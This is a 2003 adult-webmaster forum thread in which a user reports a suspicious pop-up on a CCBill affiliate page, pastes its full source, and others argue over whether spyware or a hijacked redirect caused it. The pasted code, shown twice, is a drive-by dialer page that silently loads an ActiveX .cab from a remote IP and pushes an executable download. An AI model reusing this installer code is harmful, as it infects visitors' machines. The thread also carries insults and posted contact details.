CCbill hacked? - GoFuckYourself.com

Machete_ · 04-16-2003, 04:31 AM

when try to get the new banners and links i get a popupfarm?
Any one else tryed that?

Sourcecode is:

PHP Code:


			








<html xmlns:MSIE="urn:default">

<HEAD>

<TITLE>XXX</TITLE>

<STYLE>

        MSIE\:CLIENTCAPS {behavior:url(#default#clientcaps)}

</STYLE>



<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">

</HEAD>









hahahahahahahaha language="hahahahahahahahahaha">

var f=1;

function dontgo() {



if(fhahahaha1) open("http://204.177.92.193/pt/ppjpath/denmark/", "_blank"); 

    // execTime: 4 ms





}

</hahahahahahahaha









hahahahahahahaha language=hahahahahahahahahaha src="_pin_script.js"></hahahahahahahaha





<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">

hahahahahahahaha language=hahahahahahahahahaha>

var f=1;

var AX_Installed=0;

var dlURL_main;

var dlURL_begin;

var dlURL_ns;

var dialerName;

var dialer;







if(navigator.appNamehahahaha"Microsoft Internet Explorer") { self.moveTo(0,0);

self.resizeTo(screen.availWidth,screen.availHeight); }





dialerName = "hotorgy_dk.exe"

dialer = "http://204.177.92.198/denmark/"+dialerName+"?pin="+dialerPin;    





dlURL_main = "dlmain_datefor.html?"+dialer;

dlURL_begin= "dlbegin_datefor.html?"+dialer; 

dlURL_ns = "dlns_datefor.html?"+dialer;





function privacy()

{

    window.open('http://www.freegirlfun.com/privacy.html','_blank','width=630,height=500,toolbar=0,menubar=0,scrollbars=1,status=0,resizable=1');

}



function termsconditions()

{

    window.open('http://204.177.92.193/pt/affpp/termsandcondition_dk.html','_blank','width=630,height=500,toolbar=0,menubar=0,scrollbars=1,status=0,resizable=1');

}





function popupDownload()

{

   if (AX_Installedhahahaha1) {

        dlbegin=window.open(dlURL_begin,"dlbegin","height=1,width=1,scrollbars=no")

   } else

   if(navigator.appNamehahahaha"Microsoft Internet Explorer") 

   {

       dlmain=window.open(dlURL_main,"dlmain","height=1,width=1,scrollbars=no");

   } else

   {

         downloadWin1=window.open(dlURL_ns,"downloadWin1","height=283,width=490,scrollbars=no");

   }   

}





</hahahahahahahaha

    hahahahahaha bgcolor="white" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" onunload=dontgo()>





<MSIE:CLIENTCAPS ID="idClCap" />









<TABLE WIDTH=700 BORDER=0 CELLPADDING=0 CELLSPACING=0>

    <TR>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_01.jpg" WIDTH=87 HEIGHT=113 border="0"></a></TD>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_02.jpg" WIDTH=202 HEIGHT=113 border="0"></a></TD>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_03.jpg" WIDTH=194 HEIGHT=113 border="0"></a></TD>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_04.jpg" WIDTH=217 HEIGHT=113 border="0"></a></TD>

    </TR>

    <TR>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_05.jpg" WIDTH=87 HEIGHT=153 border="0"></a></TD>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_06.jpg" WIDTH=202 HEIGHT=153 border="0"></a></TD>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_07.jpg" WIDTH=194 HEIGHT=153 border="0"></a></TD>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_08.jpg" WIDTH=217 HEIGHT=153 border="0"></a></TD>

    </TR>

    <TR>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_09.jpg" WIDTH=87 HEIGHT=21 border="0"></a></TD>

        <TD COLSPAN=2>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_10.gif" WIDTH=396 HEIGHT=21 border="0"></a></TD>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_11.gif" WIDTH=217 HEIGHT=21 border="0"></a></TD>

    </TR>

    <TR>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_12.jpg" WIDTH=87 HEIGHT=113 border="0"></a></TD>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_13.jpg" WIDTH=202 HEIGHT=113 border="0"></a></TD>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_14.jpg" WIDTH=194 HEIGHT=113 border="0"></a></TD>

        <TD>

            <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_15.gif" WIDTH=217 HEIGHT=113 border="0"></a></TD>

    </TR>

</TABLE>

<center>

<p><br>

<Table width=50%><tr><td><font face=verdana size=1 color=black>Du skal være mindst 18 år gammel for at se dette site.

Hvis du er under 18 år eller hvis materialet på dette site ikke er lovligt hvor du bor - bedes du venligst forlade sitet nu!</font></center>

<br>

<center><BR><P><font size=1 face=verdana><a href="hahahahahahahahahaha:privacy()">Privatlivs Erklæring</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="hahahahahahahahahaha:termsconditions()"><font size=1 face=verdana>Regler og retningslinier</a></center>

hahahahahahahaha language=hahahahahahahahahaha>

var dlURL="";

var strOBJECT;

strOBJECT =  "<OBJECT classid=\"clsid:DA9A0B1E-9B7B-11D3-B8A4-00C04F79641C\"\n";

strOBJECT += " codebase=\"http://204.177.92.201/quickdl/proclaim/NSupd9x.cab#version=1,0,0,13\"\n";

strOBJECT += " id=\"Catalog\"\n";

strOBJECT += " width=\"0\"\n";



strOBJECT += " height=\"0\"\n";

strOBJECT += " align=\"center\"\n";

strOBJECT += " vspace=\"0\">\n\n";

strOBJECT += " <PARAM NAME=\"DownloadURL\" value=\"" + dlURL + "\">\n";

strOBJECT += " <PARAM NAME=\"LZCompressed\" value=0>\n";

strOBJECT += " <PARAM NAME=\"Password\" value=\"\">\n";

strOBJECT += " <PARAM NAME=\"Username\" value=\"\">\n";

strOBJECT += " <PARAM NAME=\"DownloadMsg\" value=\"T&T\">\n";

strOBJECT += " <PARAM NAME=\"DownloadCompleteNav\" value=\"\">\n";

strOBJECT += " </OBJECT>";

if(navigator.appNamehahahaha"Microsoft Internet Explorer")

    document.write(strOBJECT);

</hahahahahahahaha

















hahahahahahahaha LANGUAGE="VBSCript">

DIM x,y

On Error Resume Next

AX_Installed=0

set x = CreateObject("NSUpdateLite.NSUpdateLiteCtrl.1")

if (Err = 0) then

  y = x.Version

  if (Err = 0) then

    if (y > "1,0,0,12") then

       AX_Installed=1

    end if 

  end if

  set x=Nothing

end if

PopupDownload()









</hahahahahahahaha

</BODY>

</HTML>

Validus · 04-16-2003, 04:34 AM

That text is too small on my screen, but how do u figure CCBill was hacked? Could this not just be a little glitch?

Validus · 04-16-2003, 04:35 AM

Oh, now I see the hahahaha... ugh... dunno! :-) Hahaha

Machete_ · 04-16-2003, 04:38 AM

This is the screendump

link

Machete_ · 04-16-2003, 04:42 AM

ITs fucking stealing my passwords:

PHP Code:


			
strOBJECT += " height=\"0\"\n";

strOBJECT += " align=\"center\"\n";

strOBJECT += " vspace=\"0\">\n\n";

strOBJECT += " <PARAM NAME=\"DownloadURL\" value=\"" + dlURL + "\">\n";

strOBJECT += " <PARAM NAME=\"LZCompressed\" value=0>\n";

strOBJECT += " <PARAM NAME=\"Password\" value=\"\">\n";

strOBJECT += " <PARAM NAME=\"Username\" value=\"\">\n";

strOBJECT += " <PARAM NAME=\"DownloadMsg\" value=\"T&T\">\n";

strOBJECT += " <PARAM NAME=\"DownloadCompleteNav\" value=\"\">\n";

strOBJECT += " </OBJECT>";

Theo · 04-16-2003, 04:44 AM

probably some spyware

Machete_ · 04-16-2003, 04:48 AM

NO - i have the sourcecode, but they told me;

Webmaster,

Please contact the referral webmaster of the program you are signed up
with to resolve this issue.

Regards,

Lenny S
Tech Support

SomeCreep · 04-16-2003, 04:49 AM

if you think they've been hacked, just give them a call and ask whats going on... CCBill techsupport 1-888-906-0666

Machete_ · 04-16-2003, 04:52 AM

Quote:

Originally posted by SomeCreep
if you think they've been hacked, just give them a call and ask whats going on... CCBill techsupport 1-888-906-0666

read above to se their reply

Validus · 04-16-2003, 04:58 AM

They sent an e-mail over the phone?

Machete_ · 04-16-2003, 05:00 AM

Quote:

Originally posted by Validus
They sent an e-mail over the phone?

I ALWAYS keep the dialog in writing, so I can prove what they/I said

Validus · 04-16-2003, 06:25 AM

Oh ok, well if that is the fastest way to solve a problem, its all good. Although I am sure if you would keep a little history, of when you called and who you talked to it would do the same.

But thats ok, everybody does it a different way, whatever works the best for you.

SeanE · 04-16-2003, 07:12 AM

Hello ebus_Dk,

Can you please send me an email ([email protected]) regarding this issue, you can send the same one you sent into our support staff if you would like.

I will be happy to look into the situation for you.

Feel free to ICQ me as well 84769138,
or call 888 906 0666 ext. 158

Thanks,

Sean E.

Machete_ · 04-16-2003, 07:15 AM

Quote:

Originally posted by SeanE
Hello ebus_Dk,

Can you please send me an email ([email protected]) regarding this issue, you can send the same one you sent into our support staff if you would like.

I will be happy to look into the situation for you.

Feel free to ICQ me as well 84769138,
or call 888 906 0666 ext. 158

Thanks,

Sean E.

Thanks - you have my mail I one minut

Machete_ · 04-16-2003, 10:10 AM

Problem fixed - thanks Sean

justsexxx · 04-16-2003, 10:11 AM

Quote:

Originally posted by ebus_dk
Problem fixed - thanks Sean

What was it?

Fletch XXX · 04-16-2003, 10:13 AM

cc bill is one of the easiest as can be seen by how many passwords one must delete until he/she gets pennywize

hahah

chupacabra · 04-16-2003, 10:33 AM

Quote:

cc bill is one of the easiest as can be seen by how many passwords one must delete until he/she gets pennywize

i use PW Sentry w/ ccBill to watch for both rogue accounts and accounts added via hacking the master script... but, since switching to the newer signup forms w/ ccBill, i haven't had one bogus account show up in our .htpasswd's... perhaps the hole is plugged finally..?

barryf · 04-16-2003, 10:38 AM

Why do people insist on posting this shit to the boards before calling tech support.

CCBill has 24-hour phone support for webmaster. You should try it sometime.

B

Machete_ · 04-16-2003, 10:45 AM

Quote:

Originally posted by barryf
Why do people insist on posting this shit to the boards before calling tech support.

CCBill has 24-hour phone support for webmaster. You should try it sometime.

B

SHUT up bitch !!!

I DID contact them , and the support just told me "please contact the affiliate webmaster" Thats NOT good enough when he runs a script that lifts my CCbill password and upload it to another server

Thats whaen i posted it, and THATS when something happend.

But gladly Sean took care of it, but we are still waiting for an explanation from the webmaster

Kimmykim · 04-16-2003, 12:05 PM

Quote:

Originally posted by ebus_dk
But gladly Sean took care of it, but we are still waiting for an explanation from the webmaster

Well, that's an interesting point there, perhaps it's the webmaster and not CCBill causing the issue...

Machete_ · 04-16-2003, 12:17 PM

Quote:

Originally posted by Kimmykim

Well, that's an interesting point there, perhaps it's the webmaster and not CCBill causing the issue...

it IS the webmaster causing the problem, I dident say anything else. But its located on CCbills server and its their server that get compromised. Its a pretty important part of the page, to be able to get to your ref-codes without getting you accountid and password stolen

kmanrox · 04-16-2003, 12:21 PM

ebus, you should participate in manual penile massagin much much more often.

Corina Curves · 04-16-2003, 12:34 PM

Hello. I may be the one in question. But I can assure you it is not my fault. If you like I even posted a message earlier before this post on Amateurmasters. I am not sure what is going on here and have talked to also Sean moments ago. First off all the webmaster who signed u0p for my program has e-mailed me and I have answered back every e-mail trying to figure out wtf was going on. I do not understand what has happened and have explained that to him and asked him questions. When I spoke to Sean he assured me that that the problem was fxed. Well that is fine and dandy but why and how did this happen?? I did not tweak any thing in my program since I placed it up about a year ago. So some one hackled it or id on't know. Oh and also he added a screen cap of the site that loaded. That wasn't even my site that loaded.

Here is thecapture that was sent me. This is not mine!!
http://www.corinacurves.com/ccbill.jpg

So ccbill needs to come up with an answer to this because I will not allow them to make it look like this was me. I am a good webmaster and would never screw anyone over. I have been with ccbill for a long time and they have always attended promptly to any problems I have had. And I have been 95% happy with them so I am not trying to slam ccbill but there needs to be some thing done!!

Machete_ · 04-16-2003, 01:46 PM

Quote:

Originally posted by corina
Hello. I may be the one in question. But I can assure you it is not my fault. If you like I even posted a message earlier before this post on Amateurmasters. I am not sure what is going on here and have talked to also Sean moments ago. First off all the webmaster who signed u0p for my program has e-mailed me and I have answered back every e-mail trying to figure out wtf was going on. I do not understand what has happened and have explained that to him and asked him questions. When I spoke to Sean he assured me that that the problem was fxed. Well that is fine and dandy but why and how did this happen?? I did not tweak any thing in my program since I placed it up about a year ago. So some one hackled it or id on't know. Oh and also he added a screen cap of the site that loaded. That wasn't even my site that loaded.

Here is thecapture that was sent me. This is not mine!!
http://www.corinacurves.com/ccbill.jpg

So ccbill needs to come up with an answer to this because I will not allow them to make it look like this was me. I am a good webmaster and would never screw anyone over. I have been with ccbill for a long time and they have always attended promptly to any problems I have had. And I have been 95% happy with them so I am not trying to slam ccbill but there needs to be some thing done!!

did you get my last mail? Im NOT saying you did anything of this (and welcome to GFY by the way

)
The Question was; was CCbill hacked ?
or what happend, and like I told you in the mail;
"I'll leve you and CCbill to find out what happend"

There are 2 reasons why I postet this on GFY.

1 - To make CCbill run a little faster (and Sean did a 100 meter sprint in about 8 seconds)
2 - To get a responce from the webmaster of your site (you) because the first mail bounced

Im Not gonna comment on anything else before:
1 - you guys found out how that script came there
2 - who put it there
3 - and what it did to my password

Corina Curves · 04-16-2003, 02:18 PM

Yes I got your e-mail and I sent you one back.

I am very sorry that this has happened but I am still a bit clueless as to where and how you got that code.

Bret at ccbill brought to my attention that I had a bad link in my referral program. When you cick on it Homegrwon Video pops up, because they host my site and that is like a 404 page I think you would call it. It pops up when there is a dead link. Homegrwon is very reputable and would never put some thing like that in there pops. Homegrwon is also trying to help figure this out too.

As for the code where did you get that code??

When your ccbill admin and click on get code. It usually gives you a one line code to link to me. And that is your affilliate code so that your hits can be tracked and your sales will go to you. So that is why I am confused when you say you go to the admin and you click on html why it would give you that code you posted??

Or are you viewing source on one of the pop ups and the code is there?? Is that wherte your getting that funky code from.

We do need to figure out exactly where your getting it and what is happening so we can prevent this from taking place!!

Sincerely
Corina

DannyWRP · 04-16-2003, 02:54 PM

I just posted this in response to Corina on the AmateurMasters Board:

"Corina,

Now that I see what is happening to the guy, it's not something either you or CCBill did, he already had the MoneyTree parasite in his system and browser! It can take over at random times, and it looked like it did when he was on the CCbill affiliate page.

What one of the varients does is randomly pop-up promos and ads for sites within the Moneytree system while someone is surfing. he blames it on the site he's on, without realizing that it's something already on his PC.

Tell him to scan his system with Ad-aware or similar program. he can also visit http://www.doxdesk.com/parasite which will find it for him and give him the fix.

Danny"

rowan · 04-16-2003, 03:09 PM

I'm a moneytree affiliate. What's this about a parasite?

Kimmykim · 04-16-2003, 03:22 PM

IF Moneytree were popping up something that could possibly compromise the integrity of things like user names and passwords for logins to sites, I would think that there are many people who'd be interested in taking action against them.

The potential liability issues for the sites in question, and defending themselves against a liability suit that they had nothing to do with boggle my mind.

I wouldn't be surprised to see some c&d's go out IF this is indeed the case.

DannyWRP · 04-16-2003, 03:22 PM

Check out http://www.doxdesk.com/parasite/MoneyTree.html for info on the Moneytree parasite

Machete_ · 04-16-2003, 03:50 PM

No I DONT have that paresite !!!!!!

Get you fackts straight asshole, and stop telling me whats on my system. Dont you think I would know if anything was on my mashine? Everytime something get added to my registrationn database, I get a popup - and I use spybot and adavare every day to ceep my PC clean. I posted the sourcecode THAT shoud had told you that you are WRONG

Machete_ · 04-16-2003, 04:00 PM

Quote:

Originally posted by Kimmykim
IF Moneytree were popping up something that could possibly compromise the integrity of things like user names and passwords for logins to sites, I would think that there are many people who'd be interested in taking action against them.

The potential liability issues for the sites in question, and defending themselves against a liability suit that they had nothing to do with boggle my mind.

I wouldn't be surprised to see some c&d's go out IF this is indeed the case.

Kimmykim : they DIDENT

it is run by these guys
http://204.177.92.193

DannyWRP : I dont think you want to tell people that moneytree steals passwords - you in way over your head boy

DannyWRP · 04-16-2003, 04:40 PM

Quote:

Originally posted by ebus_dk

Kimmykim : they DIDENT
it is run by these guys
http://204.177.92.193

DannyWRP : I dont think you want to tell people that moneytree steals passwords - you in way over your head boy

ebus: I never said anything was run by Moneytree (SexTracker), I said that the parasite was called MoneyTree.

Follow the link I posted above.

...and BTW, I'm never over my head

DannyWRP · 04-16-2003, 05:03 PM

Did some digging. The IP addresses in question (204.177.92.0-204.177.93.255) are run by a company called Lexitrans

Tracked down some intersting stuff on some techie message boards about these guys. It seems they take existing dialer programs, and modify them with all sorts of stuff. If you see it installed on your PC, you just assume it's from mtree.com or goin.com, or any other site that runs dialers.

If you already have any of the dialer programs in your PC, this exploits them and installs itself over them without you even knowing. They can then do all sorts of nasty stuff.

BTW, on March 18th, Lexitrans was indicted for money laundering : http://stacks.msnbc.com/news/887174.asp

You see ebus, a litle research and digging goes a long way. You should do that before you blame CCBill or Corina on a public board for what is most probably embedded in your system.

Kimmykim · 04-16-2003, 05:03 PM

Quote:

Originally posted by ebus_dk

Kimmykim : they DIDENT
it is run by these guys
http://204.177.92.193

DannyWRP : I dont think you want to tell people that moneytree steals passwords - you in way over your head boy

Look dumbass, did you see anyone mention the word Sextracker?

I said:
"The potential liability issues for the sites in question, and defending themselves against a liability suit that they had nothing to do with boggle my mind. "

hello???? is this thing on??? Sextracker would also be a site apt to sue Moneytree.

Corina Curves · 04-16-2003, 08:41 PM

I think Danny was only trying to be friendly and come up with a reason on why this happened. I am not sure why Kimmy and Ebus feel the need to respond so unfriendly back. Guess I don't get it.

I like to conduct business in more of a friendly manner not cussing at each other and being rude. This will be my last message here.

Ebus you know where to contact me and you know I will e-mail ya back. But I don't feel the need to participate in this discussion here.

I am also willing to keep this case open till we get some sort of concrete answers that way we can learn to prevent, watch for, or maybe stop this from happening again.

Sincerely
Corina

lordnorm · 04-17-2003, 02:51 PM

After Corina approached me regarding this I did a little research myself and think I have found roughly the same things that Danny had as well. This 204.177.92.193 ip in which you recieved the harmful code from is just one of several connections this person had around the world. It is indeed run by Lexitrans from KS, though I think the perp acted apart from the company owning this ip. I found a host of worms,spyware,addware at this ip addy.

Here is what I believe may have happened Ebus. Upon going to corina's webmaster page on ccbills side, there was a frame that pointed to a place on her site that did not exist. This triggered a redirect that sent you initially to homegrownvideo's front page. This is not malitious, we do this to steer traffic that is not going anywhere (404/401's) as many webmasters do on their servers. At this point you must have endured some exit traffic pop up's and then this hacker scrub made his move. He(bad guy) likely had a dialer spot that looked legit on the surface until he swapped out his page for a redirect that went to another redirect and so on. Eventually it led you to his unclean page that you posted originally.

Whatever the case is Ebus, this fellow is long gone. Once word came out of this he must have removed all redirects and flitted back into the shadows whence he came. CCbill resolved the missing page frame fairly quickly by my estimate. I can certainly appreciate the anger you felt upon being hit by this hacker. I hate these assholes to the core. Just know that we can be a source of help, but it becomes challanging when we are the source of your rancor.
I hope this helps you out some.

-N

KCat · 04-18-2003, 02:22 AM

Quote:

Originally posted by ebus_dk
DannyWRP : ...- you in way over your head boy

\

LMAO. Yeah...Danny Cox is way over his head. Does that make Carol a newbie?

04-16-2003, 04:31 AM	#1
Machete_ WINNING! Industry Role: Join Date: Oct 2002 Posts: 14,579	CCbill hacked? when try to get the new banners and links i get a popupfarm? Any one else tryed that? Sourcecode is: PHP Code: <html xmlns:MSIE="urn:default"> <HEAD> <TITLE>XXX</TITLE> <STYLE> MSIE\:CLIENTCAPS {behavior:url(#default#clientcaps)} </STYLE> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> </HEAD> hahahahahahahaha language="hahahahahahahahahaha"> var f=1; function dontgo() { if(fhahahaha1) open("http://204.177.92.193/pt/ppjpath/denmark/", "_blank"); // execTime: 4 ms } </hahahahahahahaha hahahahahahahaha language=hahahahahahahahahaha src="_pin_script.js"></hahahahahahahaha <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> hahahahahahahaha language=hahahahahahahahahaha> var f=1; var AX_Installed=0; var dlURL_main; var dlURL_begin; var dlURL_ns; var dialerName; var dialer; if(navigator.appNamehahahaha"Microsoft Internet Explorer") { self.moveTo(0,0); self.resizeTo(screen.availWidth,screen.availHeight); } dialerName = "hotorgy_dk.exe" dialer = "http://204.177.92.198/denmark/"+dialerName+"?pin="+dialerPin; dlURL_main = "dlmain_datefor.html?"+dialer; dlURL_begin= "dlbegin_datefor.html?"+dialer; dlURL_ns = "dlns_datefor.html?"+dialer; function privacy() { window.open('http://www.freegirlfun.com/privacy.html','_blank','width=630,height=500,toolbar=0,menubar=0,scrollbars=1,status=0,resizable=1'); } function termsconditions() { window.open('http://204.177.92.193/pt/affpp/termsandcondition_dk.html','_blank','width=630,height=500,toolbar=0,menubar=0,scrollbars=1,status=0,resizable=1'); } function popupDownload() { if (AX_Installedhahahaha1) { dlbegin=window.open(dlURL_begin,"dlbegin","height=1,width=1,scrollbars=no") } else if(navigator.appNamehahahaha"Microsoft Internet Explorer") { dlmain=window.open(dlURL_main,"dlmain","height=1,width=1,scrollbars=no"); } else { downloadWin1=window.open(dlURL_ns,"downloadWin1","height=283,width=490,scrollbars=no"); } } </hahahahahahahaha hahahahahaha bgcolor="white" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" onunload=dontgo()> <MSIE:CLIENTCAPS ID="idClCap" /> <TABLE WIDTH=700 BORDER=0 CELLPADDING=0 CELLSPACING=0> <TR> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_01.jpg" WIDTH=87 HEIGHT=113 border="0"></a></TD> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_02.jpg" WIDTH=202 HEIGHT=113 border="0"></a></TD> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_03.jpg" WIDTH=194 HEIGHT=113 border="0"></a></TD> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_04.jpg" WIDTH=217 HEIGHT=113 border="0"></a></TD> </TR> <TR> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_05.jpg" WIDTH=87 HEIGHT=153 border="0"></a></TD> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_06.jpg" WIDTH=202 HEIGHT=153 border="0"></a></TD> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_07.jpg" WIDTH=194 HEIGHT=153 border="0"></a></TD> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_08.jpg" WIDTH=217 HEIGHT=153 border="0"></a></TD> </TR> <TR> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_09.jpg" WIDTH=87 HEIGHT=21 border="0"></a></TD> <TD COLSPAN=2> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_10.gif" WIDTH=396 HEIGHT=21 border="0"></a></TD> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_11.gif" WIDTH=217 HEIGHT=21 border="0"></a></TD> </TR> <TR> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_12.jpg" WIDTH=87 HEIGHT=113 border="0"></a></TD> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_13.jpg" WIDTH=202 HEIGHT=113 border="0"></a></TD> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_14.jpg" WIDTH=194 HEIGHT=113 border="0"></a></TD> <TD> <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_15.gif" WIDTH=217 HEIGHT=113 border="0"></a></TD> </TR> </TABLE> <center> <p><br> <Table width=50%><tr><td><font face=verdana size=1 color=black>Du skal være mindst 18 år gammel for at se dette site. Hvis du er under 18 år eller hvis materialet på dette site ikke er lovligt hvor du bor - bedes du venligst forlade sitet nu!</font></center> <br> <center><BR><P><font size=1 face=verdana><a href="hahahahahahahahahaha:privacy()">Privatlivs Erklæring</a>      <a href="hahahahahahahahahaha:termsconditions()"><font size=1 face=verdana>Regler og retningslinier</a></center> hahahahahahahaha language=hahahahahahahahahaha> var dlURL=""; var strOBJECT; strOBJECT = "<OBJECT classid=\"clsid:DA9A0B1E-9B7B-11D3-B8A4-00C04F79641C\"\n"; strOBJECT += " codebase=\"http://204.177.92.201/quickdl/proclaim/NSupd9x.cab#version=1,0,0,13\"\n"; strOBJECT += " id=\"Catalog\"\n"; strOBJECT += " width=\"0\"\n"; strOBJECT += " height=\"0\"\n"; strOBJECT += " align=\"center\"\n"; strOBJECT += " vspace=\"0\">\n\n"; strOBJECT += " <PARAM NAME=\"DownloadURL\" value=\"" + dlURL + "\">\n"; strOBJECT += " <PARAM NAME=\"LZCompressed\" value=0>\n"; strOBJECT += " <PARAM NAME=\"Password\" value=\"\">\n"; strOBJECT += " <PARAM NAME=\"Username\" value=\"\">\n"; strOBJECT += " <PARAM NAME=\"DownloadMsg\" value=\"T&T\">\n"; strOBJECT += " <PARAM NAME=\"DownloadCompleteNav\" value=\"\">\n"; strOBJECT += " </OBJECT>"; if(navigator.appNamehahahaha"Microsoft Internet Explorer") document.write(strOBJECT); </hahahahahahahaha hahahahahahahaha LANGUAGE="VBSCript"> DIM x,y On Error Resume Next AX_Installed=0 set x = CreateObject("NSUpdateLite.NSUpdateLiteCtrl.1") if (Err = 0) then y = x.Version if (Err = 0) then if (y > "1,0,0,12") then AX_Installed=1 end if end if set x=Nothing end if PopupDownload() </hahahahahahahaha </BODY> </HTML> Last edited by Machete_; 04-16-2003 at 04:34 AM..

04-16-2003, 04:42 AM	#5
Machete_ WINNING! Industry Role: Join Date: Oct 2002 Posts: 14,579	ITs fucking stealing my passwords: PHP Code: strOBJECT += " height=\"0\"\n"; strOBJECT += " align=\"center\"\n"; strOBJECT += " vspace=\"0\">\n\n"; strOBJECT += " <PARAM NAME=\"DownloadURL\" value=\"" + dlURL + "\">\n"; strOBJECT += " <PARAM NAME=\"LZCompressed\" value=0>\n"; strOBJECT += " <PARAM NAME=\"Password\" value=\"\">\n"; strOBJECT += " <PARAM NAME=\"Username\" value=\"\">\n"; strOBJECT += " <PARAM NAME=\"DownloadMsg\" value=\"T&T\">\n"; strOBJECT += " <PARAM NAME=\"DownloadCompleteNav\" value=\"\">\n"; strOBJECT += " </OBJECT>";

04-16-2003, 04:48 AM	#7
Machete_ WINNING! Industry Role: Join Date: Oct 2002 Posts: 14,579	NO - i have the sourcecode, but they told me; Webmaster, Please contact the referral webmaster of the program you are signed up with to resolve this issue. Regards, Lenny S Tech Support Last edited by Machete_; 04-16-2003 at 04:50 AM..

04-16-2003, 04:49 AM	#8
SomeCreep :glugglug Join Date: Mar 2003 Location: Where the Wild Things Are Posts: 26,118	if you think they've been hacked, just give them a call and ask whats going on... CCBill techsupport 1-888-906-0666 __________________ Webair Hosting I use and recommend Webair for hosting.

04-16-2003, 10:13 AM	#17
Fletch XXX GFY HALL OF FAME DAMMIT!!! Join Date: Jan 2002 Location: that 504 Posts: 60,840	cc bill is one of the easiest as can be seen by how many passwords one must delete until he/she gets pennywize hahah __________________ Want an Android App for your tube, membership, or free site? Need banners or promo material? Hit us up (ICQ Fletch: 148841377) or email me fletchxxx at gmail.com - recent work - About me

04-16-2003, 04:34 AM	#2
Validus Confirmed User Industry Role: Join Date: Jul 2001 Location: Calgary, Canada Posts: 4,012	That text is too small on my screen, but how do u figure CCBill was hacked? Could this not just be a little glitch?

04-16-2003, 04:35 AM	#3
Validus Confirmed User Industry Role: Join Date: Jul 2001 Location: Calgary, Canada Posts: 4,012	Oh, now I see the hahahaha... ugh... dunno! :-) Hahaha

04-16-2003, 04:38 AM	#4
Machete_ WINNING! Industry Role: Join Date: Oct 2002 Posts: 14,579	This is the screendump link

04-16-2003, 04:44 AM	#6
Theo HAL 9000 Industry Role: Join Date: May 2001 Posts: 34,515	probably some spyware

04-16-2003, 04:58 AM	#10
Validus Confirmed User Industry Role: Join Date: Jul 2001 Location: Calgary, Canada Posts: 4,012	They sent an e-mail over the phone?

04-16-2003, 06:25 AM	#12
Validus Confirmed User Industry Role: Join Date: Jul 2001 Location: Calgary, Canada Posts: 4,012	Oh ok, well if that is the fastest way to solve a problem, its all good. Although I am sure if you would keep a little history, of when you called and who you talked to it would do the same. But thats ok, everybody does it a different way, whatever works the best for you.

04-16-2003, 07:12 AM	#13
SeanE Confirmed User Join Date: Nov 2001 Posts: 357	Hello ebus_Dk, Can you please send me an email ([email protected]) regarding this issue, you can send the same one you sent into our support staff if you would like. I will be happy to look into the situation for you. Feel free to ICQ me as well 84769138, or call 888 906 0666 ext. 158 Thanks, Sean E.

04-16-2003, 10:10 AM	#15
Machete_ WINNING! Industry Role: Join Date: Oct 2002 Posts: 14,579	Problem fixed - thanks Sean

04-16-2003, 10:38 AM	#19
barryf Confirmed User Join Date: Sep 2002 Location: Toronto, Canada Posts: 150	Why do people insist on posting this shit to the boards before calling tech support. CCBill has 24-hour phone support for webmaster. You should try it sometime. B __________________ WEBCAMCASH.COM

04-16-2003, 12:21 PM	#23
